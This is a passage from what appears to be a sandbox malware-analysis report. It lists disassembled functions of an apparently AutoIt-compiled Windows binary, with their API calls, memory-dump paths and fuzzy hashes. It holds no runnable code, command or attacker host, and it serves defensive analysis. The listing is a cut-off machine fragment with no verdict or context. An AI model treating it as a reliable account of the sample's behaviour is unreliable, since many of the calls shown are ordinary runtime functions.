                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DB8542
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DB8549
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 839392675-0
                                                                                                                  • Opcode ID: 7d20167064ad88526870e4515b39e8946ec5638d021329c58cf26cbda1df7d8a
                                                                                                                  • Instruction ID: ef1133b4ab874ecf808e14a6698a2d42410381dd8dc36b7c59cd1c43793495db
                                                                                                                  • Opcode Fuzzy Hash: 7d20167064ad88526870e4515b39e8946ec5638d021329c58cf26cbda1df7d8a
                                                                                                                  • Instruction Fuzzy Hash: A5F03A72640298BBE7215B62AD0EEFF7A7EDFC6B15F004058FA05D1250EBA06A01D6B5
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00DBA330
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00DBA341
                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00DE66D3,?,?,?,?,?,00D7E681), ref: 00DBA34E
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00DE66D3,?,?,?,?,?,00D7E681), ref: 00DBA35B
                                                                                                                    • Part of subcall function 00DB9CCE: CloseHandle.KERNEL32(?,?,00DBA368,?,?,?,00DE66D3,?,?,?,?,?,00D7E681), ref: 00DB9CD8
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DBA36E
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00DBA375
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3495660284-0
                                                                                                                  • Opcode ID: 40dee8691daf9fdd710bfa92f3181ed10ca33a7e6ab6a0460a9bfaf41e197332
                                                                                                                  • Instruction ID: c01a4efe0d7e526252a29e9939c8ecb53fc42e8fccc37afced2a6dc4c235b2fb
                                                                                                                  • Opcode Fuzzy Hash: 40dee8691daf9fdd710bfa92f3181ed10ca33a7e6ab6a0460a9bfaf41e197332
                                                                                                                  • Instruction Fuzzy Hash: 49F05E32141311EBD3112BA8ED48EEF7BBBEF89302B044521F203D12A1CBB59851CBB1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00D7BBD9: _memmove.LIBCMT ref: 00D7BC33
                                                                                                                  • __swprintf.LIBCMT ref: 00D8D98F
                                                                                                                  Strings
                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D8D832
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DCB4A8
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00DCB5B7
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DCB73A
                                                                                                                    • Part of subcall function 00DBA6F6: VariantInit.OLEAUT32(00000000), ref: 00DBA736
                                                                                                                    • Part of subcall function 00DBA6F6: VariantCopy.OLEAUT32(?,?), ref: 00DBA73F
                                                                                                                    • Part of subcall function 00DBA6F6: VariantClear.OLEAUT32(?), ref: 00DBA74B
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DB10B8
                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DB10EE
                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DB10FF
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DB1181
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                  • String ID: DllGetClassObject
                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB5A93
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00DB5AAF
                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00DB5AF5
                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E318F0,00000000), ref: 00DB5B3E
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00DD0478
                                                                                                                    • Part of subcall function 00D77F40: _memmove.LIBCMT ref: 00D77F8F
                                                                                                                    • Part of subcall function 00D7A2FB: _memmove.LIBCMT ref: 00D7A33D
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$BuffCharLower
                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                  • API String ID: 2411302734-567219261
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DAC684
                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DAC697
                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00DAC6C7
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_memmove
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 458670788-1403004172
                                                                                                                  APIs
                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DC4A60
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DC4A86
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DC4AB6
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00DC4AFD
                                                                                                                    • Part of subcall function 00DC56A9: GetLastError.KERNEL32(?,?,00DC4A2B,00000000,00000000,00000001), ref: 00DC56BE
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                  • Opcode ID: d41658aa47f0460c3f9c70ef8be067c90c29c574082d84db2066589efaedafc5
                                                                                                                  • Instruction ID: ec5e0bd4d3126cce17bbc9eb94f3739b43624cef6ce5e09bf66c9d7ff6d5e392
                                                                                                                  • Opcode Fuzzy Hash: d41658aa47f0460c3f9c70ef8be067c90c29c574082d84db2066589efaedafc5
                                                                                                                  • Instruction Fuzzy Hash: 0821ACB5540209BEEB11DF649C94FBBB6ADEB88748F10401EF106D7240EA609D059775
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DE454E
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • _memset.LIBCMT ref: 00D73965
                                                                                                                  • _wcscpy.LIBCMT ref: 00D739B5
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D739C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                  • String ID: Line:
                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                  • Opcode ID: e48d1a5c0c2acb10e11bfac10c38cd7fcaf0aea85d0d5512b13b7756e1b9feb0
                                                                                                                  • Instruction ID: 0aff8fb5ac1a71696fe2b33207969b3a2946d35fd82353cc77216e39b30eb31d
                                                                                                                  • Opcode Fuzzy Hash: e48d1a5c0c2acb10e11bfac10c38cd7fcaf0aea85d0d5512b13b7756e1b9feb0
                                                                                                                  • Instruction Fuzzy Hash: 5E318171508344AFD725EB60DC46BDA7BE8EB54310F04851EF289921A1EB70AB48DFB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                    • Part of subcall function 00D8C619: GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                    • Part of subcall function 00D8C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DD8F69
                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00DD8F70
                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DD8F85
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DD8F8D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                  • String ID: SysAnimate32
                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                  • Opcode ID: 81ae14ee2b62376312ce752f1061b9652500500e00a518907114609a76ed3143
                                                                                                                  • Instruction ID: 0f34b37c7a2990344aaff04cf7d170dfa31e9fee87be21d7bc1bb5d2f1cbb50a
                                                                                                                  • Opcode Fuzzy Hash: 81ae14ee2b62376312ce752f1061b9652500500e00a518907114609a76ed3143
                                                                                                                  • Instruction Fuzzy Hash: 20216871200209AFEB126F74DC45EBB77AAEF49324F14462AFA54A7290CB71DC50A770
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00DBE392
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00DBE3E6
                                                                                                                  • __swprintf.LIBCMT ref: 00DBE3FF
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E0DBF0), ref: 00DBE43D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                  • String ID: %lu
                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                  • Opcode ID: dc8105f0bc7c8ac8ad44cf8d9fc81eddd720b9391458fbf200cd6353da97bbb0
                                                                                                                  • Instruction ID: 6f0d08af8609f9c900a1626ac2ae8cb8bc2ca68b6fd85b854575a38dcdc41bb7
                                                                                                                  • Opcode Fuzzy Hash: dc8105f0bc7c8ac8ad44cf8d9fc81eddd720b9391458fbf200cd6353da97bbb0
                                                                                                                  • Instruction Fuzzy Hash: F2213D35A40208AFCB10EFA4C885DEE7BB9EF99715B108069F509EB252E671DA05CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                    • Part of subcall function 00DAD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DAD640
                                                                                                                    • Part of subcall function 00DAD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DAD653
                                                                                                                    • Part of subcall function 00DAD623: GetCurrentThreadId.KERNEL32 ref: 00DAD65A
                                                                                                                    • Part of subcall function 00DAD623: AttachThreadInput.USER32(00000000), ref: 00DAD661
                                                                                                                  • GetFocus.USER32 ref: 00DAD7FB
                                                                                                                    • Part of subcall function 00DAD66C: GetParent.USER32(?), ref: 00DAD67A
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00DAD844
                                                                                                                  • EnumChildWindows.USER32(?,00DAD8BA), ref: 00DAD86C
                                                                                                                  • __swprintf.LIBCMT ref: 00DAD886
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                  • String ID: %s%d
                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                  • Opcode ID: 336c4ff2ce81c65aa4a196bef5b9bf2575e602e24dc8589cdfab4c47b359d8d0
                                                                                                                  • Instruction ID: aad570dc2775cb172aec87409710126cb5aa529b6d4d752aebe738d59d4a76c7
                                                                                                                  • Opcode Fuzzy Hash: 336c4ff2ce81c65aa4a196bef5b9bf2575e602e24dc8589cdfab4c47b359d8d0
                                                                                                                  • Instruction Fuzzy Hash: C91181715002096BDF11BFA09C86FEE376AEB45704F0480B9BE0EAA186DBB49945DB71
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DD18E4
                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DD1917
                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DD1A3A
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00DD1AB0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2364364464-0
                                                                                                                  • Opcode ID: b940bf90fea1b4daec70e178f7490e5ad94b670d4199c884c5297ec5ed0e4e77
                                                                                                                  • Instruction ID: b698804ddb96fc54059147c15fa3c7da7f2c2160b35ebbc18d58f8a20bcb0d98
                                                                                                                  • Opcode Fuzzy Hash: b940bf90fea1b4daec70e178f7490e5ad94b670d4199c884c5297ec5ed0e4e77
                                                                                                                  • Instruction Fuzzy Hash: D4815274A50215BFDB10EF64C886BAD7BE9EF44720F188059F905AF382D7B4E9458BB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00DD05DF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00DD066E
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DD068C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00DD06D2
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 00DD06EC
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F282
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F2A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 327935632-0
                                                                                                                  • Opcode ID: 915442809315bf8aa93f5eae7d29233e6f2bf7677317d7703a2ba10530957db5
                                                                                                                  • Instruction ID: 06675c6fe1a4b511ae8aa7a09c5a3227a4e7fcd8181e6e55e13900f33b02de76
                                                                                                                  • Opcode Fuzzy Hash: 915442809315bf8aa93f5eae7d29233e6f2bf7677317d7703a2ba10530957db5
                                                                                                                  • Instruction Fuzzy Hash: 38511A75A002059FCB00EFA8C495AADBBB5EF88310F14C056E959AB351EB70ED55CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD2DE0
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DD2E1F
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DD2E66
                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00DD2E92
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD2E9F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3440857362-0
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DC17D4
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00DC17FD
                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DC183C
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DC1861
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DC1869
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1389676194-0
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4210589936-0
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DAC156
                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00DAC200
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00DAC208
                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00DAC216
